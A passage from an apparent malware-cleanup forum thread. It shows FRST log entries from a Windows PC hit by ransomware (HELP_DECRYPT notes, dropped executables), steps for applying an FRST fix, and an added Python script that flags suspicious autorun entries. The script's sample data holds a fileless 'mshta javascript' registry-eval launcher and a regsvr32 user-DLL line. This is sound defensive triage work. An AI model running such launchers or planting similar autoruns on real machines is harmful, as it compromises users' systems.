 2015-09-14 09:14 - 2015-09-14 09:13 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsiC137.tmp 
 2015-09-14 08:42 - 2015-09-14 08:42 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi86DF.tmp 
 2015-09-14 08:11 - 2015-09-16 08:11 - 00001012 _____ C:\Windows\Tasks\31KF7GHdyOOZkNChPv.job  
 2015-09-14 06:38 - 2015-09-14 06:38 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsh2FC5.tmp 
 2015-09-14 06:02 - 2015-09-14 06:02 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi7E0C.tmp 
 2015-09-14 06:01 - 2015-09-14 06:01 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsm81E2.tmp 
 2015-09-21 09:32 - 2015-04-08 17:35 - 00000464 _____ C:\Windows\system32\ScannerSettings  
 2015-09-20 09:48 - 2015-04-06 10:29 - 00000004 _____ C:\Windows\system32\029B560A371F4E00AB32838EBC01B9E7  
 2015-09-18 23:07 - 2015-07-30 10:31 - 00191488 _____ C:\Windows\system32\netupdsrv.exe  
 2015-09-18 23:06 - 2015-07-30 10:30 - 00350720 _____ C:\Windows\system32\nethtsrv.exe  
 2015-04-15 03:28 - 2015-04-15 03:28 - 0004387 _____ () C:\Users\DONBCI\AppData\Roaming\31KF7GHdyOOZkNChPv 
 2015-09-22 07:53 - 2015-09-22 07:53 - 0008628 _____ () C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.HTML 
 2015-09-22 07:53 - 2015-09-22 07:53 - 0045931 _____ () C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.PNG 
 2015-09-22 07:53 - 2015-09-22 07:53 - 0004254 _____ () C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.TXT  
 2015-04-15 03:28 - 2015-04-15 03:28 - 0004387 _____ () C:\Users\DONBCI\AppData\Roaming\iemFAWisUZaZqq 
 2015-07-24 12:45 - 2015-08-29 06:50 - 0000091 _____ () C:\Users\DONBCI\AppData\Roaming\WB.CFG  
 2015-09-22 07:50 - 2015-09-22 07:50 - 0008628 _____ () C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.HTML 
 2015-09-22 07:50 - 2015-09-22 07:50 - 0045931 _____ () C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.PNG 
 2015-09-22 07:50 - 2015-09-22 07:50 - 0004254 _____ () C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.TXT  
 2015-09-16 08:46 - 2015-09-16 08:46 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsb293D.tmp 
 2015-09-09 07:51 - 2015-09-09 07:51 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsbDAB3.tmp 
 2015-09-17 15:16 - 2015-09-17 15:16 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsc8F51.tmp 
 2015-09-15 08:07 - 2015-09-15 08:07 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsd7C9A.tmp 
 2015-09-12 06:30 - 2015-09-12 06:30 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nse8AF3.tmp 
 2015-07-24 12:42 - 2015-07-24 12:42 - 0628688 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsgB275.tmp 
 2015-09-09 11:04 - 2015-09-09 11:04 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsh2DF1.tmp 
 2015-09-14 06:38 - 2015-09-14 06:38 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsh2FC5.tmp 
 2015-09-07 16:17 - 2015-09-07 16:17 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsh490F.tmp 
 2015-09-10 06:02 - 2015-09-10 06:02 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nshA9B8.tmp 
 2015-09-08 12:31 - 2015-09-08 12:31 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nshFBF9.tmp 
 2015-09-11 20:59 - 2015-09-11 20:59 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi38C7.tmp 
 2015-09-14 06:02 - 2015-09-14 06:02 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi7E0C.tmp 
 2015-09-14 08:42 - 2015-09-14 08:42 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi86DF.tmp 
 2015-09-14 09:14 - 2015-09-14 09:13 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsiC137.tmp 
 2015-09-08 07:33 - 2015-09-08 07:33 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsm2325.tmp 
 2015-09-14 06:01 - 2015-09-14 06:01 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsm81E2.tmp 
 2015-09-12 07:40 - 2015-09-12 07:40 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsn49F9.tmp 
 2015-09-15 08:36 - 2015-09-15 08:36 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nso7A0E.tmp 
 2015-09-12 11:58 - 2015-09-12 11:58 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsr1533.tmp 
 2015-09-08 14:21 - 2015-09-08 14:21 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nst639E.tmp 
 2015-09-11 15:52 - 2015-09-11 15:52 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsu576C.tmp 
 2015-09-07 13:37 - 2015-09-07 13:37 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nswE409.tmp 
 2015-09-07 14:08 - 2015-09-07 14:08 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsx5233.tmp 
 2015-09-08 10:50 - 2015-09-08 10:50 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsxA214.tmp 
 2015-09-10 07:46 - 2015-09-10 07:46 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsxD547.tmp 
 2015-09-07 15:21 - 2015-09-07 15:20 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsxEC72.tmp 
 2015-09-14 21:49 - 2015-09-14 21:47 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsy76E2.tmp 
 2015-09-16 22:56 - 2015-09-16 22:56 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsy84C4.tmp 
 2015-09-17 14:07 - 2015-09-17 14:07 - 0077312 _____ () C:\Users\DONBCI\AppData\Local\Vaiaholding.exe  
 2015-09-17 14:07 - 2015-09-17 14:07 - 0000187 _____ () C:\Users\DONBCI\AppData\Local\Vaiaholding.exe.config  
 2015-09-22 07:47 - 2015-09-22 07:47 - 0008628 _____ () C:\ProgramData\HELP_DECRYPT.HTML 
 2015-09-22 07:47 - 2015-09-22 07:47 - 0045931 _____ () C:\ProgramData\HELP_DECRYPT.PNG 
 2015-09-22 07:47 - 2015-09-22 07:47 - 0004254 _____ () C:\ProgramData\HELP_DECRYPT.TXT  
 2015-07-23 13:21 - 2015-06-16 08:42 - 0087040 ___SH () C:\ProgramData\msnqoirw.exe  
Once the text is pasted into Notepad:
File menu, then Save As.
On the left, select the Desktop.
In the file name field at the bottom, enter: fixlist.txt
Click Save; this will create a fixlist.txt file on the desktop.

Relaunch FRST and click the Corriger / Fix button.
Depending on the case, a restart is needed (not mandatory).
A text file appears; copy/paste its contents here in a new message.

Restart the computer.

Then reset your browsers:
==================================
Reset your browsers and/or manually reconfigure your web browsers (start page, search engine, etc.), and also remove/disable useless or parasitic extensions:
* Firefox: http://forum.malekal.com/firefox-extens ... 36057.html
* Google Chrome: http://forum.malekal.com/google-chrome- ... 35837.html
* Internet Explorer and add-ons / search engines: http://forum.malekal.com/
First basic rule of security: think, then click, and not the other way round - Files/programs are like candy: when they come from a stranger, you don't accept them!
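
Added example, not part of the original posts and not FRST's own logic: a small Python triage pass over FRST-style autorun lines, flagging the launcher patterns visible in the fixlist above (an `mshta javascript:` Run value that evaluates data read from the registry, `regsvr32` loading a DLL from a user profile, an executable started from `ProgramData`). The sample lines are constructed in the same format, and the rule names and heuristics are assumptions chosen for illustration.

```python
import re

# Constructed sample lines in the FRST "Registry" section format (not real data).
SAMPLE = r"""
HKLM\...\Run: [VendorAppManager] => C:\Program Files\Vendor\AppManager\AppMgr.exe [523144 2015-07-30] (Vendor Inc.)
HKLM\...\Run: [**a1b2c3d4<*>] => mshta javascript:x=new%20ActiveXObject(WScript.Shell);y=x.RegRead(HKLM\\software\\example\\value);eval(y);
HKLM\...\Policies\Explorer\Run: [1234567890] => C:\ProgramData\example.exe [87040 2015-06-16] ()
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-0-0-0-1000\...\Run: [ExampleDll] => regsvr32.exe C:\Users\user\AppData\Local\Example\example.dll
"""

# "<key ending in \Run>: [<value name>] => <command line>"
ENTRY_RE = re.compile(
    r"^\s*(?P<key>HK\S*?\\(?:Policies\\Explorer\\)?Run): "
    r"\[(?P<name>.*?)\] => (?P<data>.*)$"
)

# Heuristics (assumptions for this example, not an exhaustive rule set).
SCRIPT_HOST = re.compile(r"(?i)\bmshta(?:\.exe)?\b.*?\b(?:javascript|vbscript):")
REGSVR32 = re.compile(r"(?i)\bregsvr32(?:\.exe)?\b")
USER_WRITABLE = re.compile(r"(?i)\\(?:Users\\[^\\]+\\AppData|ProgramData)\\")
ODD_NAME = re.compile(r'[*<>?|"]')


def classify(name, data):
    """Return the list of reasons an autorun entry deserves a closer look."""
    reasons = []
    low = data.lower()
    if SCRIPT_HOST.search(data):
        # The autorun starts a script host with inline script, no file on disk.
        reasons.append("script-host")
    if "regread" in low and "eval(" in low:
        # The inline script pulls its real payload out of another registry value.
        reasons.append("registry-eval")
    if USER_WRITABLE.search(data):
        # Code started from a directory any user-level process can write to.
        if REGSVR32.search(data):
            reasons.append("regsvr32-user-dll")
        else:
            reasons.append("user-writable-path")
    if ODD_NAME.search(name):
        # Unusual characters in the value name, as FRST itself points out.
        reasons.append("odd-value-name")
    return reasons


def triage(log_text):
    """Parse FRST-style Run lines and return [(value_name, reasons)] for flagged ones."""
    flagged = []
    for line in log_text.splitlines():
        match = ENTRY_RE.match(line)
        if not match:
            continue  # policy flags, blank lines, other sections
        reasons = classify(match.group("name"), match.group("data"))
        if reasons:
            flagged.append((match.group("name"), reasons))
    return flagged


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE):
        print(f"{name}: {', '.join(reasons)}")
```
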